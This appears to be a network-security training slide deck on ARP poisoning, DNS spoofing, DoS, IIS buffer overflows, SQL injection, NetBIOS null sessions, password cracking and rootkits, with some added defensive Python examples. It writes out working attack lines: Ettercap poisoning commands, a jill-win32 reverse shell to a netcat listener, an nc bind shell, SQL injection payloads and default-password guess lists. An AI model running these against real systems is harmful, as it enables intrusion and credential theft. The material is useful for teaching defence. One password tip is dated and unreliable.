Network Security
and Hacking Techniques
Day-3
Network Security and Hacking Techniques – DAY-3
Typical Network Hacking Techniques
"The Linux Based Services that Mean Business Securing Internet"
(Diagram: a visible IP address in front of an internal network of PC servers running Linux and Windows, host/application servers, and IDS and sniffer hosts; the attacker's goal: "I want these systems".)
Network-Level Attacks
ARP Refresher
Sniffing Attacks
Sniffing Detection
Ettercap Example
DNS Cache Poisoning
Denial of Service Attacks
ARP Refresher
ARP Message Formats
ARP packets provide the mapping between hardware-layer and protocol-layer addresses.
28-byte header for an IPv4 Ethernet network:
• 8 bytes of ARP data
• 20 bytes of Ethernet/IP address data
6 ARP messages:
• ARP request and reply
• ARP reverse request and reply
• ARP inverse request and reply
Gathering and Parsing Packets (Cont..)
IP Address Spoofing Variations
ARP Request Message
Source contains the initiating system's MAC address and IP address
Destination contains the broadcast MAC address ff:ff:ff:ff:ff:ff
ARP Reply Message
Source contains replying system’s MAC address and IP address
Destination contains requestor’s MAC address and IP address
Unsolicited ARP Reply
Any system can spoof a reply to an ARP request
Receiving system will cache the reply
Overwrites existing entry
Adds entry if one does not exist
Usually called ARP poisoning
Types of Attack
Sniffing Attacks
Session Hijacking/MiM
Sniffing on a Hub
(Diagram: Sniffer, Source and Destination all attached to the same hub)
Host to Host Exploit
(Diagram: Client (C), Server (S) and a Hostile host on one segment)
Broadcast ARP Request
Real ARP Reply
Spoofed ARP Reply (C)
Spoofed ARP Reply (S)
Host to Router Exploit
(Diagram: Client (C), Gateway Router (R) and a Hostile host)
Broadcast ARP Request
Real ARP Reply
Spoofed ARP Reply (C)
Spoofed ARP Reply (R)
Relay Configuration
(Diagram)
M-1: 0:c:3b:9:4d:8 - 10.1.1.7
M-3: 0:c:3b:1c:2f:1b - 10.1.1.2
Attacker: 0:c:3b:1a:7c:ef - 10.1.1.10
Poisoned entries: 0:c:3b:1a:7c:ef - 10.1.1.7 and 0:c:3b:1a:7c:ef - 10.1.1.2 (both victims' addresses now resolve to the attacker's MAC)
Relay Configuration (cont.)
(Diagram: Sniffer, Source and Destination attached to a switch)
Detection
OS Level Detection
Operating System      OS Level Detection
Windows 95            NO
Windows 98            NO
Windows NT            NO
Windows 2000          NO
Linux RedHat 7.0      NO
FreeBSD 4.2           YES
Hypothetical Detection Application
Purpose
Track and maintain ARP/IP pairings
Identify non-standard ARP replies versus acceptable ones
• Timeout issues
OS must withstand corruption itself
Fix broken ARP entries of systems
• Transmission of correct ARP replies
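The ARP format from the refresher and the detection application described above, as an added Python example that is not part of the slides (it is not arpwatch or any other tool named here): it parses the 28-byte ARP header, keeps the IP/MAC pairings, and flags unsolicited replies and changed pairings. The packets are constructed from the slides' addresses (zero-padded); class and function names are this example's own.

```python
"""Added example: parse 28-byte ARP packets and flag the poisoning patterns
described on these slides (unsolicited replies, IP/MAC pairings that change).
Sample packets are constructed from the slides' addresses; the class and
function names are this example's own, not from any tool named here."""
import struct

ARP_REQUEST, ARP_REPLY = 1, 2


def _mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def _ip_bytes(ip):
    return bytes(int(x) for x in ip.split("."))


def build_arp(opcode, sender_mac, sender_ip, target_mac, target_ip):
    """Build the 28-byte IPv4-over-Ethernet ARP payload: 8 fixed bytes
    (hw type 1, proto 0x0800, hlen 6, plen 4, opcode) followed by
    6+4+6+4 bytes of address data. Used here only to construct samples."""
    hdr = struct.pack("!HHBBH", 1, 0x0800, 6, 4, opcode)
    return (hdr + _mac_bytes(sender_mac) + _ip_bytes(sender_ip)
            + _mac_bytes(target_mac) + _ip_bytes(target_ip))


def parse_arp(payload):
    """Return (opcode, sender_mac, sender_ip, target_mac, target_ip)."""
    if len(payload) < 28:
        raise ValueError("short ARP packet")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", payload[:8])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not an IPv4-over-Ethernet ARP packet")
    sha, spa, tha, tpa = struct.unpack("!6s4s6s4s", payload[8:28])
    fmt_mac = lambda b: ":".join(f"{x:02x}" for x in b)
    fmt_ip = lambda b: ".".join(str(x) for x in b)
    return op, fmt_mac(sha), fmt_ip(spa), fmt_mac(tha), fmt_ip(tpa)


class ArpMonitor:
    """Tracks IP->MAC pairings (arpwatch-style) and records the two signs of
    poisoning: a reply nobody asked for, or a known IP whose MAC changes.
    If the spoofed reply wins the race, the real reply still triggers the
    second alert. Gratuitous ARP (sender IP == target IP) is also unsolicited
    and will be reported; tune that out if your network relies on it."""

    def __init__(self):
        self.table = {}       # ip -> mac learned from traffic
        self.pending = set()  # IPs with an outstanding request
        self.alerts = []

    def _learn(self, ip, mac):
        old = self.table.get(ip)
        if old is not None and old != mac:
            self.alerts.append(("changed", ip, old, mac))
        self.table[ip] = mac

    def observe(self, payload):
        op, smac, sip, tmac, tip = parse_arp(payload)
        if op == ARP_REQUEST:
            self.pending.add(tip)
            self._learn(sip, smac)
        elif op == ARP_REPLY:
            if sip in self.pending:
                self.pending.discard(sip)
            else:
                self.alerts.append(("unsolicited", sip, smac))
            self._learn(sip, smac)
        return self.alerts


def demo():
    """Replays the slides' scenario: 10.1.1.2 asks for 10.1.1.7, the real
    host answers, then a spoofed reply maps 10.1.1.7 to the attacker's MAC."""
    mon = ArpMonitor()
    real_7, real_2 = "00:0c:3b:09:4d:08", "00:0c:3b:1c:2f:1b"
    attacker = "00:0c:3b:1a:7c:ef"
    unknown = "00:00:00:00:00:00"  # target MAC in a request is unknown
    mon.observe(build_arp(ARP_REQUEST, real_2, "10.1.1.2", unknown, "10.1.1.7"))
    mon.observe(build_arp(ARP_REPLY, real_7, "10.1.1.7", real_2, "10.1.1.2"))
    mon.observe(build_arp(ARP_REPLY, attacker, "10.1.1.7", real_2, "10.1.1.2"))
    return mon.alerts


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

To run it on live traffic, feed `ArpMonitor.observe` the ARP payload (bytes after the 14-byte Ethernet header) of each frame with EtherType 0x0806.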
Tools and Utilities
Manipulation
Dsniff 2.3
Hunt 1.5
Growing number of others
Local monitoring
Arpwatch 1.11
Tools - ARP Spoofing
Windows
Ettercap
Unix
Dsniff
Hunt
Ettercap
To start: C:\ettercap -i dev1
• Try dev0, dev1, dev2, etc., until it finds your Ethernet adapter
• It takes a long time to scan the network
Ettercap Sniffing Options
Usage: ettercap [OPTION] [HOST:PORT] [HOST:PORT] [MAC] [MAC]
Sniffing method:
-a, --arpsniff ARPBASED sniffing (specifying two hosts)
SMARTARP (specifying one host but with the list
PUBLICARP (specifying only one host silently)
in silent mode : must specify both IP and MAC
i.e.: ettercap -Nza IP IP MAC MAC (ARPBASE
ettercap -Na IP MAC (SMARTARP
ettercap -Nza IP MAC (PUBLICAR
-s, --sniff IPBASED sniffing
you can specify the ANY ip that means ALL hosts
e.g.: ettercap -Nzs ANY:80 (sniff only http)
-m, --macsniff MACBASED sniffing
e.g.: ettercap -zm MAC1 MAC2
ettercap -Nm MAC
Off Line Sniffing:
-T, --readpcapfile OFFLINE sniffing (read packets from a file)
e.g.: ettercap -T file_dumped_from_tcpdump
-Y, --writepcapfile DUMP packets to a pcap compatible file format
e.g.: ettercap -NzsY file_to_be_dumped
Spoofing example with Ettercap
HOST 1 is told that 10.1.1.7 is on 0:c:3b:1a:7c:ef
HOST 2 is told that 10.1.1.2 is on 0:c:3b:1a:7c:ef
(C:\ettercap -a 10.1.1.2 10.1.1.7 0:c:3b:1c:2f:1b 0:c:3b:9:4d:8)
Now they are poisoned! They will send their packets to us. Then, if we receive packets from:
HOST 1 we forward to 0:c:3b:9:4d:8
HOST 2 we forward to 0:c:3b:1c:2f:1b
(Diagram, as in Relay Configuration: M-1 0:c:3b:9:4d:8 - 10.1.1.7; M-3 0:c:3b:1c:2f:1b - 10.1.1.2; poisoned entries 0:c:3b:1a:7c:ef - 10.1.1.7 and 0:c:3b:1a:7c:ef - 10.1.1.2; Attacker 0:c:3b:1a:7c:ef - 10.1.1.10)
Bibliography
Finlayson, Mann, Mogul, Theimer, RFC 903, "A Reverse Address Resolution Protocol," June 1984
Kra, Hunt 1.5, http://www.gncz.cz/kra/index.html, Copyright 2000
Lawrence Berkeley National Laboratory, Network Research Group, Arpwatch 1.11, ftp://ftp.ee.lbl.gov/arpwatch.tar.Z, Copyright 1996
Plummer, David C., RFC 826, "An Ethernet Address Resolution Protocol," November 1982
Russell, Ryan and Cunningham, Stace, "Hack Proofing Your Network," Syngress Publishing Inc., Copyright 2000
Song, Dug, Dsniff 2.3, http://www.monkey.org/~dugsong/, Copyright 2000
Network-Level Attacks (Cont…)
Packet Sniffing:
A packet sniffer is a piece of software that grabs all of the traffic flowing
dsniff -n -i 1
DNS Cache Poisoning
DNS Cache Poisoning
DNS ID Spoofing
DNS Hides Poisoning
DNS Cache Poisoning - TOOL
http://www.securiteinfo.com/download/wds.zip
This tool is a simple DNS ID Spoofer for Windows 9x/2K
the MAC address of the DNS server (or the default gateway if the DNS server is in another network).
Usage : wds -h
Example : wds -n www.microsoft.com -i 216.239.39.101 -g 00-00-39-5c-45-3b
Gathering and Parsing Packets (Cont..)
The ARP Cache poisoning:
Denial of Service Attacks
Denial of Service Attacks
DoS attacks are as old as the Internet itself.
In 2000 a completely new quality of DoS attack appeared: the distributed DoS (DDoS).
DDoS struck a large number of prominent web sites including Yahoo, eBay, Amazon and Buy.com.
DDoS concepts:
• Distributing the attack across several hosts
• Coordinating the attack among many machines
• Using the distribution system to thwart all attempts to discover the origin of the attack
Denial of Service Attacks
TCP Connections
Denial of Service Attacks (Cont…)
Abusing TCP: The Traditional SYN Flood
"Smurf"
(Diagram: Perpetrator, Internet, Victim)
ICMP echo with the spoofed source address of the victim, sent to an IP broadcast address
ICMP echo replies returned to the victim
Denial of Service Attacks (Cont…)
The Development of Bandwidth Attacks
Denial of Service Attacks (Cont…)
DOS
Denial of Service Attacks (Cont…)
DDOS
Denial of Service Attacks (Cont…)
Distributed Reflection DOS
Denial of Service Attacks (Cont…)
Packet path diffusion
Denial of Service Attacks (Cont…)
Diffusing the path
Prevention Techniques
Ingress Filtering
Deployed by ISPs to drop packets with source IP addresses outside the range of a customer's network, so that attackers cannot use forged source addresses to launch a DoS attack.
Egress Filtering
Prevents one's own network from being the source of forged communications used in DoS attacks.
Web Application Attacks
Introduction
Hacking Windows 2000: A Sample
SQL Injection: Manipulating Back-end Databases
Cross-Site Scripting
The Hacking Exposed Philosophy
"The most important step towards securing your network is trying to break into it."
Background
Most “script kiddies” will attack the OS and web server service.
They scan for web ports, search for vulnerabilities, and then attack.
The more sophisticated attacker will attack the custom application running on the web server.
Hacking Step 1: Scanning…
Step 1: Using Nmap or any port scanner, the attacker finds which ports are open on the network and which application is running on each of them.
Hacking Step 2: Vulnerability Scanning…
Web vulnerability scanners check for known holes.
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items
#nikto.pl -h 206.135.57.178
-- nikto / v1.4.0 / rain forest puppy / www.wiretrip.net --
- Loaded script database of 1968 lines
= - = - = - = - = - =
= Host: 206.135.57.178
= Server: Apache/1.3.20 (Unix)
- www.apache.org
+ 404 Not Found: GET /cfdocs/
- Directory index: /scripts/
+ Found: GET /scripts/cfcache.map
+ 404 Not Found: GET /cfcache.map
+ 404 Not Found: GET /cfide/Administrator/startstop.html
Hacking Step 2: Vulnerability Identification
Search Internet for current vulnerabilities
http://www.google.com
http://www.securityfocus.com
http://www.packetstormsecurity.com/
Vulnerability Identification
www.SecurityFocus.com
Vulnerabilities by vendor
Vulnerabilities by BID
www.securityfocus.com/bid/<bid #>
Vulnerability Identification
www.packetstormsecurity.com Useful directory of site
http://packetstormsecurity.com/windows2000/
Hacking Windows 2000
More recently, the most effective way to compromise a Windows NT/2000 system is via Internet Information Server (IIS).
IIS is installed by default and listens on TCP 80; many don't realize it's there (and vulnerable…).
Those who run their Website on IIS can't just block access to it.
Windows 2000 ships with IIS version 5 (IIS5). Microsoft's flagship Webserver has a long history of security flaws.
It is debatable whether these flaws are more prevalent in Microsoft code, or whether Microsoft's code is simply more prevalent.
(Yes, we'll talk about Gartner later…)
Top Five Windows 2000 IIS Threats
Remote Command Execution Via Internet Printing Service
Microsoft IIS CGI Filename Decode Error Vulnerability
Remote command execution via Buffer Overflow in Indexing Service
Unauthorised SMTP relaying
Buffer Overflow in FrontPage server extension
Remote Command Execution Via Internet Printing Service
Internet Printing is a new feature in Windows, introduced with the release of Windows 2000 Server.
It provides users with the ability to access a printer across an Intranet or the Internet and submit a job directly to the printer through the browser.
This functionality is enabled by default
The vulnerability exists in an unchecked buffer in the msw3prt.dll, allowing an attacker to post a string of approximately 420 characters that will cause the buffer to overflow and commands to be overwritten with the newly injected shell code.
IIS Buffer Overflows: IPP
Simple to exploit:
GET /null.printer HTTP/1.0
Host: [> 420 char. buffer]
IIS Buffer Overflows: IPP
Published exploits:
jill-win32.exe by dark spyrit
Iis5hack.exe by hsj
Remotely exploits buff. overflow, inserts shellcode to “shell” back to a listener on attacker’s system
Evil…
IIS Buffer Overflows: IPP
IPP Buffer Overflow DEMO
Start netcat listener on attacker's system
nc -vv -l -p 23
Execute jill-win32:
jill-win32 victim 80 attacker 23
Shell pops up on attacker's machine, SYSTEM context
Practicals
Try to compromise your server
SQL Scanning
TCP port 1433
SQL Server defaults to listen on these ports since ip-sockets net-lib is installed by default (along with named pipes)
UDP port 1434
Thanks to multiple instancing, having to know the exact port is not needed to connect since the net-libs will be more than happy to auto-connect you to the instance
SQL Scanning (cont.)
Starting nmapNT V. 2.53 SP1 by [email protected]
eEye Digital Security ( http://www.eEye.com )
based on nmap by [email protected] ( www.insecure.org/nmap/ )
Interesting ports on (10.6.6.205):
(The 1507 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
88/tcp open kerberos-sec
135/tcp open loc-srv
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1026/tcp open nterm
1080/tcp open socks
1433/tcp open ms-sql-s -------
3389/tcp open msrdp
SQL Server Discovery
Multiple instancing capabilities of SQL Server 2000 make enumeration a functional requirement
A specially formed UDP packet directed at port 1434 will cause the SQL 2K listener service to divulge information about every instance of SQL Server running on that machine
Packet Information
• Instance names
• Net-libs supported
• TCP ports and pipe names
• Clustering support (juicy targets)
Broadcast Discovery
Since the listener may exist on multiple machines, it is possible to send a broadcast UDP packet to port 1434 to discover all instances of SQL Server 2000 on a subnet
sql -L (will return a raw listing)
Capture returned packets
Analyze
SQL Server Discovery
The following is a sample response from a SQL Server to the UDP broadcast:
(Captured using Snort-1.6.3 – http://www.snort.org)
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] SQL Server Reply [**]
12/22-14:18:22.320099 10.6.7.37:1434 -> 10.6.6.194:4412
UDP TTL:128 TOS:0x0 ID:15054
Len: 133
.z.ServerName;DEV-REPORT2;InstanceName;MSSQLSERVER;IsClustered;N
o;Version;8.00.194;tcp;1433;np;\\DEV-REPORT2\pipe\sql\query;;
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
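The listener response above, decoded by an added Python example that is neither the slide's nor SQLPing's code: it parses the 0x05 / length / text layout visible in the capture (the ".z." prefix is 0x05 0x7a 0x00, i.e. 122 bytes of text, matching the UDP Len of 133 with its 8-byte header), splits the key;value pairs, and lists the exposed instances the way an inventory would. Sample responses are constructed from the slide's capture and from the SQLPing listing that follows; the function names are assumptions.

```python
"""Added example (not from the slides or from SQLPing): decode a SQL Server
2000 listener response from UDP 1434 so exposed instances can be inventoried.
Sample responses are constructed from the slides' Snort capture and SQLPing
listing; the function names are this example's own."""
import struct


def parse_ssrp_response(data):
    """Return one dict per SQL Server instance found in a 1434/udp reply.
    Layout as seen in the capture: byte 0x05, a little-endian 16-bit length
    of the text that follows, then key;value pairs, with ';;' ending each
    instance (the capture's '.z.' prefix is 0x05 0x7a 0x00: 122 bytes)."""
    if len(data) < 3 or data[0] != 0x05:
        raise ValueError("not an SSRP server response")
    (length,) = struct.unpack("<H", data[1:3])
    if len(data) < 3 + length:
        raise ValueError("truncated SSRP response")
    text = data[3:3 + length].decode("ascii", errors="replace")
    instances = []
    for chunk in text.split(";;"):
        fields = chunk.split(";")
        if len(fields) < 2:
            continue  # empty tail after the final ';;'
        instances.append({fields[i]: fields[i + 1]
                          for i in range(0, len(fields) - 1, 2)})
    return instances


def exposure_summary(data):
    """One line per instance for a defender's inventory:
    server\\instance, TCP port (if any), version, clustered flag."""
    lines = []
    for inst in parse_ssrp_response(data):
        lines.append("%s\\%s tcp:%s version:%s clustered:%s" % (
            inst.get("ServerName", "?"), inst.get("InstanceName", "?"),
            inst.get("tcp", "-"), inst.get("Version", "?"),
            inst.get("IsClustered", "?")))
    return lines


def _encode(text):
    """Wrap instance text in the 0x05 + little-endian length header."""
    body = text.encode("ascii")
    return b"\x05" + struct.pack("<H", len(body)) + body


# Constructed from the slide's Snort dump (one default instance).
SAMPLE_DEV_REPORT2 = _encode(
    "ServerName;DEV-REPORT2;InstanceName;MSSQLSERVER;IsClustered;No;"
    "Version;8.00.194;tcp;1433;np;\\\\DEV-REPORT2\\pipe\\sql\\query;;")

# Constructed from the slide's SQLPing listing: two instances in one reply.
SAMPLE_LANDROVER = _encode(
    "ServerName;LANDROVER;InstanceName;SQL2K;IsClustered;No;Version;8.00.194;"
    "tcp;1241;np;\\\\LANDROVER\\pipe\\MSSQL$SQL2K\\sql\\query;;"
    "ServerName;LANDROVER;InstanceName;MSSQLServer;IsClustered;No;"
    "Version;7.00.623;np;\\\\LANDROVER\\pipe\\sql\\query;tcp;1433;rpc;LANDROVER;;")


if __name__ == "__main__":
    for sample in (SAMPLE_DEV_REPORT2, SAMPLE_LANDROVER):
        for line in exposure_summary(sample):
            print(line)
```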
SQLPing Utility
Directs a custom udp packet at a specific target or subnet and enumerates the server info across multiple instances
Listening....
ServerName:LANDROVER
InstanceName:SQL2K
IsClustered:No
Version:8.00.194
tcp:1241
np:\\LANDROVER\pipe\MSSQL$SQL2K\sql\query
ServerName:LANDROVER
InstanceName:MSSQLServer
IsClustered:No
Version:7.00.623
np:\\LANDROVER\pipe\sql\query
tcp:1433
rpc:LANDROVER
http://www.sqlsecurity.com/utils/sqlping.zip
SQL Code Injection
Ability of an attacker to inject unintended SQL statements into application
Consequences
• Exposure of sensitive data
• SQL privilege escalation
• OS access
• COM+ access
Scope of SQL Injection
SQL injection attacks rarely alert IDS systems, especially over SSL
Difficult to track down all the areas of exploitation, since the only real solution is manual code review
No amount of OS security, firewalls or patch diligence will stop SQL injection.
The solution is good coding practices
SQL Injection Sample
ASP Code
<%
Set Conn = Server.CreateObject("ADODB.Connection")
Conn.open "dsn=myapp;uid=sa;pwd=45nf3k332fhj"
' user input is concatenated straight into the SQL text
Set RS = Conn.Execute("SELECT * from users where username='" & username & "' AND password='" & password & "'")
%>
SQL Injection Example 1
Normal login
SQL Server sees
• select * from users where username='bob' and password='b2oQeDr!'
• All is well (or so it seems)
Login Page
UserName: bob
Password: b2oQeDr!
SQL Injection Example 1
Malicious Login
SQL Server sees
• select * from users where username='bob' and password='' union select * from users where admin=1
• In this case the user logs in as the site administrator
Login Page
UserName: bob
Password: ' union select * from users where admin=1--
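The Example 1 login replayed in an added Python example (not the slides' ASP code): the concatenated query from the ASP sample beside the parameterised form, run against an in-memory SQLite table constructed here (SQLite standing in for SQL Server; the admin row and its password are made up). Function names are this example's own.

```python
"""Added example (not the slides' ASP code): the login query built by string
concatenation beside the parameterised form, against an in-memory SQLite
table constructed here. SQLite stands in for SQL Server; it parses the
slide's payload the same way (quote closes the literal, UNION, -- comment)."""
import sqlite3

# Slide's Example 1 password field, verbatim.
PAYLOAD = "' union select * from users where admin=1--"


def make_db():
    """Constructed users table: bob from the slide plus a made-up admin row."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, admin INTEGER)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("bob", "b2oQeDr!", 0), ("siteadmin", "Xk9#pq2v", 1)])
    return db


def login_vulnerable(db, username, password):
    """Mirrors the ASP sample: input spliced into the SQL text, so a quote in
    the password ends the literal and the rest of the input is parsed as SQL."""
    sql = ("SELECT * FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    return db.execute(sql).fetchall()


def login_safe(db, username, password):
    """Same query with bound parameters: values travel separately from the
    statement, so quotes, UNION and -- in the input are only characters."""
    sql = "SELECT * FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchall()


def demo():
    """Returns ((vulnerable, safe) for the normal login,
                (vulnerable, safe) for the slide's malicious login)."""
    db = make_db()
    normal = (login_vulnerable(db, "bob", "b2oQeDr!"),
              login_safe(db, "bob", "b2oQeDr!"))
    malicious = (login_vulnerable(db, "bob", PAYLOAD),
                 login_safe(db, "bob", PAYLOAD))
    return normal, malicious


if __name__ == "__main__":
    (n_vuln, n_safe), (m_vuln, m_safe) = demo()
    print("normal login:", n_vuln, n_safe)
    print("malicious login, concatenated SQL:", m_vuln)   # the admin row
    print("malicious login, parameterised SQL:", m_safe)  # nothing
```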
SQL Injection Example 2
Normal usage
Notice that on a search page we get immediate feedback – good target for injection
Also, since we see three columns we can assume that's all the SQL statement is selecting
User Search
Enter Last Name: andrews
Results:
Last First email
Andrews, chip [email protected]
SQL Injection Example 2
Malicious Usage
User Search
Enter Last Name: ' union select '','',@@version
Results:
Last First email
Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 1)
SQL Injection Samples
Problems
Poor input validation
Secret in ASP code (source code disclosure)
Poorly typed – SQL server and ASP not checking data-types
Security context too high for needed functionality
Best Practices
Use principle of least-privilege
Assign MSSQLServer service non-administrator user context
Take the time to properly implement trusted security (Integrated Mode)
Don’t place passwords in script
Assign complex ‘sa’ password even when using Integrated security
Consider dropping certain procedures in the interest of security. They can always be added later.
Operating System and Application-Level Attacks
Password Cracking With L0phtCrack
NetBios/SMB Hacking
Buffer Overflows in Depth
Examples of remote root exploit through buffer overflow
Root Kits
NetBios/SMB Hacking
Introduction
SMB/NetBios Explained and Exploited
Win2k Architecture
Network and Host Enumeration
Penetration
Pillaging Hosts
Escalation
Summary and Wrap-up
SMB/NetBios Explained and Exploited
SMB is Server Message Block
A protocol over NetBios or TCP
Used for "net use" type communications
• UDP port 137 (name services)
• UDP port 138 (datagram services)
• TCP port 139 (session services)
NT uses port 139
Win2k uses ports 139 and/or 445
SMB/NetBios Explained and Exploited
Mapping a drive with this syntax will prompt for a password:
net use * \\target\share */user:domain\username
A null session is a connection with no user name and no password; it needs access to TCP 139, 445, IPX, or NetBEUI:
net use \\target\share "" /user:""
Null sessions are not meaningfully logged
They are a normal part of other network operations
Attackers can use them to enumerate the network
Host Enumeration
Just to reiterate… We are connecting with a BLANK username and a BLANK password
This functionality is enabled by default on NT/2000 (port 445 also)
This is one of the most debilitating vulnerabilities faced by NT/2000 deployments of all sizes!
This connection is not logged in the Event Log, nor is it recorded by a majority of the Host Based IDS products
Penetration
The primary goal is to authenticate ourselves to the remote host. We can do this by:
Guessing username / password combinations,
Obtaining the user hashes, or
Exploiting a vulnerable service
Password Guessing
Guessing Username/Password combinations:
Review results from DumpSec output
Identify those that:
• haven’t changed their passwords recently
• haven’t logged on recently
• are members of the admin group
• may be a shared group account
• are lab or test accounts
• have juicy info in the comment field
Guessing Passwords
NT/2000 does not support logging on with multiple credentials simultaneously, so:
Log off as null session user:
net use * /del
Attempt to logon as target user:
net use \\target\ipc$ * /user:target\username
Password Guessing
High Probability Combinations (username: passwords)
administrator: blank, password, administrator
arcserve: arcserve, backup
test: test, password
lab: lab, password
username: username, company_name
backup: backup
tivoli: tivoli
symbiator: symbiator, as400
backupexec: backup
enum Brute Force Features
usage: enum [switches] [hostname|ip]
-U: get userlist
-M: get machine list
-N: get namelist dump (different from -U|-M)
-S: get sharelist
-P: get password policy information
-G: get group and member list
-L: get LSA policy information
-D: dictionary crack, needs -u and -f
-d: be detailed, applies to -U and -S
-c: don't cancel sessions
-u: specify username to use (default "")
-p: specify password to use (default "")
-f: specify dictfile to use (wants -D)
Password Guessing
Countermeasures
Enable lockout for all accounts
Use passprop to enable Admin lockout (remote only, not TS)
Enforce password policy (passfilt, KB Q161990, W2K Account Policy)
Audit logon/logoff failures
Treat the Administrator and Domain Admins accounts as holders of the keys to the kingdom – they are!
Sniffing Password Data
NT/2000 uses a challenge/response authentication mechanism
Neither passwords nor their hashes are sent across the wire
However, the L0pht discovered a way to extract hashes from the logon exchange
SMB Packet Capture
L0phtCrack (2.52) works on an NT4 machine but does not work on Win 2000
Version 3 incorporates a new packet driver that works? [not yet] on Win 2000
ScoopLM from SecurityFriday does work on Win2k
Sniffing Passwords..L0pht
Sniffing Passwords..ScoopLM
Cracking Passwords
Once you've obtained password hashes, there's no good reason not to start cracking them immediately
Several tools have been written to optimize this process
The best are:
L0phtcrack
John the Ripper
BeatLM, for use with ScoopLM
Cracking Passwords
L0phtcrack
Cracking Passwords
John the Ripper Version 1.6 Copyright (c) 1996-98 by Solar Designer
Usage: john [OPTIONS] [PASSWORD-FILES]
-single "single crack" mode
-wordfile:FILE -stdin wordlist mode, read words from FILE or stdin
-rules enable rules for wordlist mode
-incremental[:MODE] incremental mode [using section MODE]
-external:MODE external mode or word filter
-stdout[:LENGTH] no cracking, just write words to stdout
-restore[:FILE] restore an interrupted session [from FILE]
-session:FILE set session file name to FILE
-status[:FILE] print status of a session [from FILE]
-makechars:FILE make a charset, FILE will be overwritten
-show show cracked passwords
-test perform a benchmark
-users:[-]LOGIN|UID[,..] load this (these) user(s) only
-groups:[-]GID[,..] load users of this (these) group(s) only
-shells:[-]SHELL[,..] load users with this (these) shell(s) only
-salts:[-]COUNT load salts with at least COUNT passwords only
-format:NAME force ciphertext format NAME (DES/BSDI/MD5/BF/AFS/LM)
-savemem:LEVEL enable memory saving, at LEVEL 1..3
Cracking Passwords
Countermeasure
Enforce password length of exactly 7 characters
All passwords should meet complexity minimums, such as different case, numerals, and punctuation
Get Interactive Overview
If we are truly to become the machine, there are certain things we must do:
First, copy up our admin kit
Second, gain an interactive shell
Last, prepare the target machine in order to launch further attacks
Get Interactive
Map to a drive on the target host and copy over the following files:
fscan
Netcat
Local
Global
Pwdump2,3
Remote
Lsadump2
Cp
DumpSec
Getmac
Netdom
Nltest
Get Interactive : REMOTE.EXE
Launch remote.exe on the target host
Syntax: remote /s "cmd.exe" [secret]
Connect to remote pipe
Syntax: remote /c hostname [secret]
Get Interactive : NC.EXE
Netcat syntax on remote host: nc -l -d -p 2002 -e "cmd.exe"
Netcat syntax to connect to listener: nc -n -v target_ip 2002
This is the preferable method, but it only works over IP. Great when 139 is blocked.
Operating System and Application-Level Attacks
Buffer Overflows in Depth
Buffer Overflow Exploit
In general, a buffer overflow attack involves the following steps:
i. stuffing more data into a buffer than it can hold
ii. overwriting the return address of a function
iii. switching the execution flow to the attacker's code
Operating System and Application-Level Attacks
Process Memory Region
RootKit
Root Kits
The name rootkit is a combination of two words, root and kit
A collection of tools that enable an attacker to keep root power
Types of Rootkit
Application rootkit - established at the application layer.
Kernel rootkit - established deeper, at the kernel layer.
RootKit (Cont…)
Application Rootkit
Programs replaced to hide the attacker's presence.
Examples: ls, ps, top, du, find, ifconfig, lsof
Network daemons with backdoors
Sniffer program
Kernel Rootkit
Hiding processes
Hiding files
Hiding the sniffer
Hiding the file system
NT Rootkit
Process hiding
NT Rootkit
File hiding
NT Rootkit
Rootkit console with Keyboard sniffing
Detecting hidden processes
Two software tools
Anonymity on the web
Anonymity and the Internet
Anonymizing proxy
Case Studies – Anonymity WebSite
Case Studies – Anonymity Softwares
Questions
Anonymity and the Internet
Anonymity: the state of being unknown or unfamiliar
Sometimes it is important for one’s identity to remain anonymous
Why might individuals want their identity to remain anonymous?
People generally do not like to be tracked without their knowledge. The average web surfer and Internet hacker wishes to remain anonymous.
Anonymity and the Internet
There are many ways user information can be discovered.
An individual's location or identity can be determined using "cookies" and/or an IP address
Cookie: a small piece of information that a server stores on the user's computer. Example: a yellow pages site
IP address: a series of four numbers which uniquely identifies your computer on the Internet. Example: 129.186.1.201
ISPs keep track of the IP addresses their customers use, and may also keep records of names and pseudonyms
Anonymizing proxy
Acts as a proxy for users
Hides information from end servers
Sees all web traffic
Free and subscription services available
Some free services add advertisements to web pages
(Diagram: Browser -> Proxy -> End Server; the request is relayed through the proxy and the reply returns the same way)
Case Studies – Anonymity WebSite
Anonymizer.com
Proxify.com
Case Studies – Anonymity Software
JAP
It is integrated with the browser
Case Studies – Anonymity Software
Hopster: Bypass Firewall, Bypass Proxy
Anonymity on the web
Questions ??